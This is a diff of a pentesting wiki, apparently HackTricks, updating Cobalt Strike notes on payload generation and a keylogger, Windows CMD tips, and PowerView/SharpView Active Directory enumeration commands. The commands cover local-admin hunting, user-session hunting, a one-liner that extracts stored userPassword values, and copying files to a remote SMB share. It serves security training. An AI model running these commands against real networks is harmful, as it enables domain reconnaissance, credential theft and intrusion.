GitBook: [#3369] No subject

SUMMARY.md

@@ -191,7 +191,7 @@
   * [Mimikatz](windows-hardening/stealing-credentials/credentials-mimikatz.md)
 * [Basic CMD for Pentesters](windows-hardening/basic-cmd-for-pentesters.md)
 * [Basic PowerShell for Pentesters](windows-hardening/basic-powershell-for-pentesters/README.md)
-  * [PowerView](windows-hardening/basic-powershell-for-pentesters/powerview.md)
+  * [PowerView/SharpView](windows-hardening/basic-powershell-for-pentesters/powerview.md)
 * [AV Bypass](windows-hardening/av-bypass.md)
 
 ## 📱 Mobile Pentesting

c2/cobalt-strike.md

@@ -2,24 +2,13 @@
 
 ### Listeners
 
-### C2 Listeners
-
-`Cobalt Strike -> Listeners -> Add/Edit` then you can select where to listen, which kind of beacon to use (http, dns, smb...) and more.
-
-### Peer2Peer Listeners
-
-The beacons of these listeners don't need to talk to the C2 directly, they can communicate to it through other beacons.
-
-`Cobalt Strike -> Listeners -> Add/Edit` then you need to select the TCP or SMB beacons
-
-* The **TCP beacon will set a listener in the port selected**. To connect to a TCP beacon use the command `connect <ip> <port>` from another beacon
-* The **smb beacon will listen in a pipename with the selected name**. To connect to a SMB beacon you need to use the command `link [target] [pipe]`.
+Cobalt Strike -> Listeners -> Add/Edit then you can select where to listen, which kind of beacon to use (http, dns, smb...) and more
 
 ### Generate & Host payloads
 
 #### Generate payloads in files
 
-`Attacks -> Packages ->`&#x20;
+Attacks -> Packages ->&#x20;
 
 * **`HTMLApplication`** for HTA files
 * **`MS Office Macro`** for an office document with a macro
@@ -28,7 +17,7 @@ The beacons of these listeners don't need to talk to the C2 directly, they can c
 
 #### Generate & Host payloads
 
-`Attacks -> Web Drive-by -> Scripted Web Delivery (S)` This will generate a script/executable to download the beacon from cobalt strike in formats such as: bitsadmin, exe, powershell and python
+A`ttacks -> Web Drive-by -> Scripted Web Delivery (S)` This will generate a script/executable to download the beacon from cobalt strike in formats such as: bitsadmin, exe, powershell and python
 
 #### Host Payloads
 
@@ -40,6 +29,7 @@ If you already has the file you want to host in a web sever just go to `Attacks
 # Execute local .NET binary
 execute-assembly </path/to/executable.exe>
 
+
 # Screenshots
 printscreen    # Take a single screenshot via PrintScr method
 screenshot     # Take a single screenshot
@@ -49,7 +39,4 @@ screenwatch    # Take periodic screenshots of desktop
 # keylogger
 keylogger [pid] [x86|x64]
 ## View > Keystrokes to see the keys pressed
-
-# Import Powershell module
-powershell-import C:\path\to\PowerView.ps1
 ```

windows-hardening/basic-cmd-for-pentesters.md

@@ -108,6 +108,7 @@ net user /domain #List all users of the domain
 net user <ACCOUNT_NAME> /domain #Get information about that user
 net accounts /domain #Password and lockout policy
 nltest /domain_trust #Mapping of the trust relationships.
+gpresult /V # Get current policy applied
 ```
 
 ### Logs & Events
@@ -441,6 +442,9 @@ xcopy /hievry C:\Users\security\.yawcam \\10.10.14.13\name\win
 dir /r #Detect ADS
 more file.txt:ads.txt #read ADS
 powershell (Get-Content file.txt -Stream ads.txt)
+
+# Get error messages from code
+net helpmsg 32 #32 is the code in that case
 ```
 
 ### Listen address ACLs

windows-hardening/basic-powershell-for-pentesters/powerview.md

@@ -1,4 +1,4 @@
-# PowerView
+# PowerView/SharpView
 
 <details>
 
@@ -18,6 +18,8 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 
 The most up-to-date version of PowerView will always be in the dev branch of PowerSploit: [https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1)
 
+****[**SharpView**](https://github.com/tevora-threat/SharpView) is a .NET port of [**PowerView**](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1)****
+
 ### Quick enumeration
 
 ```bash
@@ -76,10 +78,13 @@ Get-NetDomainController -Domain mydomain.local #Get all ifo of specific domain D
 Get-ForestDomain
 ```
 
-### Users, Groups and Computers
+### Users, Groups, Computers & OUs
 
 ```bash
 # Users
+## Get usernames and their groups
+Get-DomainUser -Properties name, MemberOf | fl
+## Get-DomainUser and Get-NetUser are kind of the same
 Get-NetUser #Get users with several (not all) properties
 Get-NetUser | select -ExpandProperty samaccountname #List all usernames
 Get-NetUser -UserName student107 #Get info about a user
@@ -104,6 +109,8 @@ Get-ObjectAcl "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ? {
 }
 
 #Groups
+Get-DomainGroup | where Name -like "*Admin*" | select SamAccountName
+## Get-DomainGroup is similar to Get-NetGroup 
 Get-NetGroup #Get groups
 Get-NetGroup -Domain mydomain.local #Get groups of an specific domain
 Get-NetGroup 'Domain Admins' #Get all data of a group
@@ -117,11 +124,20 @@ Get-DomainObjectAcl -SearchBase 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local'
 Get-NetGPOGroup #Get restricted groups
 
 # Computers
+Get-DomainComputer -Properties DnsHostName # Get all domain maes of computers
+## Get-DomainComputer is kind of the same as Get-NetComputer
 Get-NetComputer #Get all computer objects
 Get-NetComputer -Ping #Send a ping to check if the computers are working
 Get-NetComputer -Unconstrained #DCs always appear but aren't useful for privesc
 Get-NetComputer -TrustedToAuth #Find computers with Constrined Delegation
 Get-DomainGroup -AdminCount | Get-DomainGroupMember -Recurse | ?{$_.MemberName -like '*$'} #Find any machine accounts in privileged groups
+
+#OU
+Get-DomainOU -Properties Name | sort -Property Name #Get names of OUs
+Get-DomainOU "Servers" | %{Get-DomainComputer -SearchBase $_.distinguishedname -Properties Name} #Get all computers inside an OU (Servers in this case)
+## Get-DomainOU is kind of the same as Get-NetOU
+Get-NetOU #Get Organization Units
+Get-NetOU StudentMachines | %{Get-NetComputer -ADSPath $_} #Get all computers inside an OU (StudentMachines in this case)
 ```
 
 ### Logon and Sessions
@@ -142,10 +158,12 @@ Find-DomainShare -CheckShareAccess #Search readable shares
 Find-InterestingDomainShareFile #Find interesting files, can use filters
 ```
 
-### GPOs & OUs
+### GPOs
 
 ```bash
 #GPO
+Get-DomainGPO | select displayName
+## Get-DomainGPO and Get-NetGPO are similar
 Get-NetGPO #Get all policies with details
 Get-NetGPO | select displayname #Get the names of the policies
 Get-NetGPO -ComputerName <servername> #Get the policy applied in a computer
@@ -153,10 +171,10 @@ gpresult /V #Get current policy
 # Enumerate permissions for GPOs where users with RIDs of > -1000 have some kind of modification/control rights
 Get-DomainObjectAcl -LDAPFilter '(objectCategory=groupPolicyContainer)' | ? { ($_.SecurityIdentifier -match '^S-1-5-.*-[1-9]\d{3,}$') -and ($_.ActiveDirectoryRights -match 'WriteProperty|GenericAll|GenericWrite|WriteDacl|WriteOwner')}
 Get-NetGPO -GPOName '{3E04167E-C2B6-4A9A-8FB7-C811158DC97C}' #Get GPO of an OU
-
-#OU
-Get-NetOU #Get Organization Units
-Get-NetOU StudentMachines | %{Get-NetComputer -ADSPath $_} #Get all computers inside an OU (StudentMachines in this case)
+# Returns all GPOs that modify local group memberships through Restricted Groups or Group Policy Preferences.
+Get-DomainGPOLocalGroup | select GPODisplayName, GroupName, GPOType
+# Enumerates the machines where a specific domain user/group is a member of a specific local group.
+Get-DomainGPOUserLocalGroupMapping -LocalGroup Administrators | select ObjectName, GPODisplayName, ContainerName, ComputerName
 ```
 
 ### ACL
@@ -173,6 +191,7 @@ Get-NetGroupMember -GroupName "Administrators" -Recurse | ?{$_.IsGroup -match "f
 
 ```bash
 Get-NetDomainTrust #Get all domain trusts (parent, children and external)
+Get-DomainTrust #Same
 Get-NetForestDomain | Get-NetDomainTrust #Enumerate all the trusts of all the domains found
 Get-DomainTrustMapping #Enumerate also all the trusts
 
@@ -192,22 +211,37 @@ Get-DomainForeignGroupMember #Get groups with privileges in other domains inside
 ```bash
 #Check if any user passwords are set
 $FormatEnumerationLimit=-1;Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru} | fl
+
 #Asks DC for all computers, and asks every compute if it has admin access (very noisy). You need RCP and SMB ports opened.
 Find-LocalAdminAccess
+
 #(This time you need to give the list of computers in the domain) Do the same as before but trying to execute a WMI action in each computer (admin privs are needed to do so). Useful if RCP and SMB ports are closed.
 .\Find-WMILocalAdminAccess.ps1 -ComputerFile .\computers.txt
+
 #Enumerate machines where a particular user/group identity has local admin rights
 Get-DomainGPOUserLocalGroupMapping -Identity <User/Group>
-#Goes through the list of all computers (from DC) and executes Get-NetLocalGroup to search local admins (you need root privileges on non-dc hosts).
+
+# Enumerates the members of specified local group (default administrators)
+# for all the targeted machines on the current (or specified) domain.
 Invoke-EnumerateLocalAdmin
+Find-DomainLocalGroupMember
+
 #Search unconstrained delegation computers and show users
 Find-DomainUserLocation -ComputerUnconstrained -ShowAll
+
 #Admin users that allow delegation, logged into servers that allow unconstrained delegation
 Find-DomainUserLocation -ComputerUnconstrained -UserAdminCount -UserAllowDelegation
-#Get members from Domain Admins (default) and a list of computers and check if any of the users is logged in any machine running Get-NetSession/Get-NetLoggedon on each host. If -Checkaccess, then it also check for LocalAdmin access in the hosts.
+
+#Get members from Domain Admins (default) and a list of computers
+# and check if any of the users is logged in any machine running Get-NetSession/Get-NetLoggedon on each host.
+# If -Checkaccess, then it also check for LocalAdmin access in the hosts.
+## By default users inside Domain Admins are searched
+Find-DomainUserLocation [-CheckAccess] | select UserName, SessionFromName
 Invoke-UserHunter [-CheckAccess]
+
 #Search "RDPUsers" users
 Invoke-UserHunter -GroupName "RDPUsers"
+
 #It will only search for active users inside high traffic servers (DC, File Servers and Distributed File servers)
 Invoke-UserHunter -Stealth
 ```